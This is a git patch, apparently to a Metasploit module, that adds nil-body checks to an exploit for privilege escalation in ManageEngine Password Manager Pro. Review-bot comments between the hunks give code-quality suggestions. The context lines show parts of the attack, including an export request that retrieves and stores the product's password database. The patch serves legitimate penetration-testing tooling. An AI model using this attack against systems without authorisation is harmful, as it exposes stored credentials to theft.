From 2236518694142b2a6033dd675ab83277605dff36 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Mon, 10 Nov 2014 09:47:05 -0600
Subject: [PATCH] Check res.body before accessing #to_s
---
 .../auxiliary/admin/http/manageengine_pmp_privesc.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
index ae6517d5fd..c39efd7c76 100644
--- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
+++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
@@ -59,13 +59,13 @@ class Metasploit3 < Msf::Auxiliary
 if res && res.code == 200
 # 2nd step: we try to get the ORGN_NAME and AUTHRULE_NAME from the page (which is only needed for the MSP versions)
- if res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/
+ if res.body && res.body.to_s =~ /id="ORGN_NAME" name="ORGN_NAME" value="([\w]*)"/
 orgn_name = $1
 else
 orgn_name = nil
 end
- if res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/
+ if res.body && res.body.to_s =~ /id="AUTHRULE_NAME" name="AUTHRULE_NAME" value="([\w]*)"/
 authrule_name = $1
 else
 authrule_name = nil
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
 'userName' => username
 }
 })
- if res && res.code == 200
+ if res && res.code == 200 && res.body
 domain_name = res.body.to_s.strip
 else
 domain_name = nil
@@ -192,7 +192,7 @@ class Metasploit3 < Msf::Auxiliary
 'uri' => normalize_uri("PassTrixMain.cc"),
 'method' => 'GET'
 })
- if res && res.code == 200 &&
+ if res && res.code == 200 && res.body &&
 res.body.to_s =~ /ManageEngine Password Manager Pro/ &&
 (
 res.body.to_s =~ /login\.css\?([0-9]+)/ || # PMP v6
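Review bot: In the hunk at line 59 the added `res.body &&` guard does not appear to change behaviour, because `nil.to_s` already returns an empty string and neither pattern can match it; the same holds for the guards added in the hunks at lines 192 and 259. If the goal is readability, converting once (`body = res.body.to_s`) and matching both patterns against `body` would remove the repeated conversions. `Regexp.last_match(1)` is clearer than `$1`, and `[\w]*` can be written `\w*`. The enclosing `if res && res.code == 200` block continues past the end of the hunk.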
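Review bot: In the hunk at line 83 the new `res.body` test rejects only a nil body; an empty or whitespace-only body still sets `domain_name` to `""`, which is truthy in Ruby. If the code after the hunk (not visible here) treats any non-nil `domain_name` as a real value, it would be safer to normalise it: keep `domain_name = res.body.to_s.strip` and follow it with `domain_name = nil if domain_name.empty?`.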
@@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary
 'RequestType' => 'ExportResources'
 }
 })
- if res && res.code == 200 && res.body.to_s.length > 0
+ if res && res.code == 200 && res.body && res.body.to_s.length > 0
 vprint_line(res.body.to_s)
 print_good("#{peer} - Successfully exported password database from Password Manager Pro.")
 loot_name = 'manageengine.passwordmanagerpro.password.db'
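Review bot: `vprint_line(res.body.to_s)` writes the whole exported password database to the console whenever verbose output is enabled, so the credentials can end up in terminal scrollback and in any console log or spool file rather than only in the loot store. The lines after the hunk are not visible, but the `loot_name` assignment suggests the body is saved as loot anyway; I would drop the dump or print only its size, e.g. `vprint_status("#{peer} - Received #{res.body.to_s.length} bytes")`. The length test would also read better as `!res.body.to_s.empty?`.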